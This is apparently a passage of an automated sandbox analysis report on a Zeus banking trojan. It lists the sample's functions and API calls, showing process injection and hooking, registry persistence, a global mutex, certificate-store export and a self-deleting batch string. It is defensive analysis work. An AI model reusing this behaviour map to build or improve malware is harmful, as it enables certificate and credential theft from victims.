WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,003C316D,?,00000000,?,?,00000000), ref: 003C25AB
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,003C316D,?,00000000,?,?,00000000), ref: 003C25CB

Part of subcall function 003C1D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 003C1D3B
Part of subcall function 003C1D15: WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000,?,00000000,?,003C25E9,00000000,?,?,?,?,003C316D,?), ref: 003C1D4F
Part of subcall function 003C1D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 003C1D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,003C316D,?,00000000), ref: 003C261A

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BE89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 003BE8E0

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 003C76B3
Part of subcall function 003C768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 003C76E2
Part of subcall function 003C768E: RegCloseKey.ADVAPI32(?), ref: 003C7702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 003BE8A7, 003BE8B2, 003BE8BE, 003BE8D9
Qanyodfyy, xrefs: 003BE8B7, 003BE8F2

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00418737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0041874E

Part of subcall function 004146F4: GetTickCount.KERNEL32(00418766,?), ref: 004146F4

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 0041856B: CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
Part of subcall function 0041856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
Part of subcall function 0041856B: CloseHandle.KERNEL32(00000000), ref: 004185B5

Strings

tmp, xrefs: 00418767
%s%08x.%s, xrefs: 0041876C

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414C02, Relevance: 4.6, APIs: 3, Instructions: 55

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00414C47
CloseHandle.KERNEL32(00414CCC), ref: 00414C6F
CloseHandle.KERNEL32(?), ref: 00414C74

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041768E, Relevance: 4.6, APIs: 3, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,?,00000000,0000011C,?), ref: 004176B3

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,?), ref: 004176E2

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

RegCloseKey.ADVAPI32(?), ref: 00417702

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C1D15, Relevance: 4.5, APIs: 3, Instructions: 46

APIs

DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 003C1D3B
WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000,?,00000000,?,003C25E9,00000000,?,?,?,?,003C316D,?), ref: 003C1D4F
DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 003C1D69

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041856B, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
CloseHandle.KERNEL32(00000000), ref: 004185B5

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00416AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AC3
GetLastError.KERNEL32(?,?,004149F4,?,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 00416AC9

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AEF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004149D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 004149E2

Part of subcall function 00416AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AC3
Part of subcall function 00416AAA: GetLastError.KERNEL32(?,?,004149F4,?,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 00416AC9
Part of subcall function 00416AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00412326,000000FF,00422C08), ref: 00414A0E

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CloseHandle.KERNEL32(?), ref: 00414A23

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,003C9EAB,?,?,00000004), ref: 003C7658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,003C9EAB,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7672
RegCloseKey.ADVAPI32(00000004,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7681

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C245B, Relevance: 4.5, APIs: 3, Instructions: 35

APIs

Part of subcall function 003C7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 003C7AB5

CreateMutexW.KERNELBASE(003D2C30,00000001,?,003D2E70,76C605D7,?,00000002,?,76C605D7), ref: 003C24A3
GetLastError.KERNEL32 ref: 003C24AF
CloseHandle.KERNEL32(00000000), ref: 003C24BD

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041886A, Relevance: 4.5, APIs: 3, Instructions: 31

APIs

CreateFileW.KERNEL32(00000100,00000100,00000001,00000000,00000003,?,00000000), ref: 0041888A
SetFileTime.KERNELBASE(00000000,?,?,?), ref: 004188A4
CloseHandle.KERNEL32(00000000), ref: 004188B0

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041897D, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,02000000,00000000), ref: 00418995
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 004189A9
CloseHandle.KERNEL32(00000000), ref: 004189B5

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C2BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 003C20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 003C2105
Part of subcall function 003C20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 003C21DB
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 003C21FA
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 003C220C
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 003C221E
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 003C2230
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 003C2242
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 003C2254
Part of subcall function 003C20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 003C228D
Part of subcall function 003C20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 003C229C
Part of subcall function 003C20C4: InitializeCriticalSection.KERNEL32(003D400C,?,?,00000000), ref: 003C22C9
Part of subcall function 003C20C4: WSAStartup.WS2_32(00000202,?), ref: 003C22DF
Part of subcall function 003C20C4: CreateEventW.KERNEL32(003D2C30,00000001,00000000,00000000,?,?,00000000), ref: 003C2300
Part of subcall function 003C20C4: GetLengthSid.ADVAPI32(00000000,000000FF,003D2C08,?,?,00000000), ref: 003C2335
Part of subcall function 003C20C4: GetCurrentProcessId.KERNEL32(00000000,0194F7D0,00000000,?,?,00000000), ref: 003C2362

Part of subcall function 003C2A32: CloseHandle.KERNEL32(003D2AF0), ref: 003C2AF2

Part of subcall function 003BE959: CreateMutexW.KERNELBASE(003D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,003B4E69,?,?,?,743C152E,00000002), ref: 003BE97F

CoInitializeEx.OLE32(00000000,00000002), ref: 003C2C62

Part of subcall function 003C9837: CoUninitialize.OLE32 ref: 003C9845

Part of subcall function 003CD486: CertOpenSystemStoreW.CRYPT32(00000000,003B4BBC,?,00000000,00000001), ref: 003CD4A1
Part of subcall function 003CD486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 003CD4BD
Part of subcall function 003CD486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 003CD4C9
Part of subcall function 003CD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 003CD508
Part of subcall function 003CD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 003CD538
Part of subcall function 003CD486: CharLowerW.USER32 ref: 003CD556
Part of subcall function 003CD486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 003CD561
Part of subcall function 003CD486: CertCloseStore.CRYPT32(?,00000000), ref: 003CD5EA

Part of subcall function 003CD5FB: CertOpenSystemStoreW.CRYPT32(00000000,003B4BBC,?,00000001,003C2C2A), ref: 003CD606
Part of subcall function 003CD5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,003C2C2A), ref: 003CD61F
Part of subcall function 003CD5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,003C2C2A), ref: 003CD62A
Part of subcall function 003CD5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,003C2C2A), ref: 003CD632
Part of subcall function 003CD5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,003C2C2A), ref: 003CD63E

Part of subcall function 003CA138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 003CA170

Strings

@, xrefs: 003C2C99

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414E20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31

APIs

CharToOemW.USER32(?,?), ref: 00414E35

Part of subcall function 004140F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0041410D

Part of subcall function 00414E7B: CharToOemW.USER32(?,?), ref: 00414EAB
Part of subcall function 00414E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414F2F

Strings

:ddel "%s"if exist "%s" goto d, xrefs: 00414E43

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BE959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(003D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,003B4E69,?,?,?,743C152E,00000002), ref: 003BE97F

Part of subcall function 003BE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 003BE8E0

Part of subcall function 003C6B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003C6B0A
Part of subcall function 003C6B07: CloseHandle.KERNEL32(00000000), ref: 003C6B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 003BE95A, 003BE963, 003BE96C, 003BE977

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C9D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(003D3F24,00000000,7718F8FF), ref: 003C9D8F

Part of subcall function 003C7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,003C9E26,?,?), ref: 003C75AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 003C9E63

Part of subcall function 003C763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,003C9EAB,?,?,00000004), ref: 003C7658
Part of subcall function 003C763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,003C9EAB,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7672
Part of subcall function 003C763A: RegCloseKey.ADVAPI32(00000004,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7681

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C7711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,003C9E78,?), ref: 003C771E
Part of subcall function 003C7711: RegCloseKey.KERNEL32(?), ref: 003C772E

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C1EE1, Relevance: 3.1, APIs: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 003C1F2C

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

lstrcmpiW.KERNEL32(?,?,?), ref: 003C1F56

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004197D0, Relevance: 3.0, APIs: 2, Instructions: 36

APIs

VirtualProtect.KERNELBASE(0041CA1A,?,00000040,00000000,76C55F4D,?,?,00412F6C,?,?), ref: 004197E5
VirtualProtect.KERNELBASE(0041CA1A,?,00000000,00000000,?,?,00412F6C,?,?), ref: 00419818

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041C799, Relevance: 3.0, APIs: 2, Instructions: 32

APIs

Sleep.KERNEL32(-00001388,0041CA1A,0000FFFF,000001E6,?,0041C85A,00000000,?,00000001,00000000,?,?,0041CA1A), ref: 0041C7BC
SetFileAttributesW.KERNELBASE(0041CA1A,00000020,00000000,00000000,?,0041C85A,00000000,?,00000001,00000000,?,?,0041CA1A,?,000001E6,0000FFFF), ref: 0041C7C7

Part of subcall function 0041856B: CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
Part of subcall function 0041856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
Part of subcall function 0041856B: CloseHandle.KERNEL32(00000000), ref: 004185B5

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00417607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00419E26,?,?,?,004175CD,?,?,00000000,00000004,?), ref: 0041761F
RegCloseKey.KERNEL32(?,?,004175CD,?,?,00000000,00000004,?,?,?,?,00419E26,?,?), ref: 0041762D

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C7607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,003C9E26,?,?,?,003C75CD,?,?,00000000,00000004,?), ref: 003C761F
RegCloseKey.KERNEL32(?,?,003C75CD,?,?,00000000,00000004,?,?,?,?,003C9E26,?,?), ref: 003C762D

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C7711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,003C9E78,?), ref: 003C771E
RegCloseKey.KERNEL32(?), ref: 003C772E

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00418678, Relevance: 2.5, APIs: 2, Instructions: 16

APIs

VirtualFree.KERNEL32(0041CA1A,00000000,00008000,00000000,0041C83B,0041CA1A,?,000001E6,0000FFFF,00000001,0041CA1A,C:\Users\admin\AppData\Roaming,00000000), ref: 00418689
CloseHandle.KERNEL32(00000B8C), ref: 00418697

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BBE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,003BC160,003D2360), ref: 003BBE72

Part of subcall function 003BBD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,003BC160,00000000,00000000,00000004,?,?,003BC160,003D2360), ref: 003BBD86
Part of subcall function 003BBD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,003BC160,003D2360), ref: 003BBD9C
Part of subcall function 003BBD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,003BC160,003BC160,?,?,003BC160,003D2360), ref: 003BBDB6

Part of subcall function 003C7BF7: VirtualProtectEx.KERNELBASE(000000FF,003BC160,0000001E,00000040,`#=,003BC158,00000004,?,?,?,?,003BBE97,6A003D23,00000000), ref: 003C7C24
Part of subcall function 003C7BF7: ReadProcessMemory.KERNELBASE(000000FF,003BC160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,003BBE97,6A003D23,00000000), ref: 003C7C4B
Part of subcall function 003C7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 003C7CC5
Part of subcall function 003C7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 003C7CED
Part of subcall function 003C7BF7: VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#=,`#=,?,?,?,?,003BBE97,6A003D23,00000000,?,?,003BC160,003D2360), ref: 003C7D05

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00417595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00419E26,?,?), ref: 004175AD

Part of subcall function 00417607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00419E26,?,?,?,004175CD,?,?,00000000,00000004,?), ref: 0041761F
Part of subcall function 00417607: RegCloseKey.KERNEL32(?,?,004175CD,?,?,00000000,00000004,?,?,?,?,00419E26,?,?), ref: 0041762D

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C7595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,003C9E26,?,?), ref: 003C75AD

Part of subcall function 003C7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,003C9E26,?,?,?,003C75CD,?,?,00000000,00000004,?), ref: 003C761F
Part of subcall function 003C7607: RegCloseKey.KERNEL32(?,?,003C75CD,?,?,00000000,00000004,?,?,?,?,003C9E26,?,?), ref: 003C762D

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00412507, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

CreateMutexW.KERNELBASE(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 00416B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00416B0A
Part of subcall function 00416B07: CloseHandle.KERNEL32(00000000), ref: 00416B1C

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414998, Relevance: 1.3, APIs: 1, Instructions: 20

APIs

Sleep.KERNELBASE(00000014,00000000,0041CACA,?,00000028,00000001,?,?,?,00000000,000001E6,?,C:\Users\admin\AppData\Roaming,?,00000001,C:\Users\admin\AppData\Roaming), ref: 004149AE
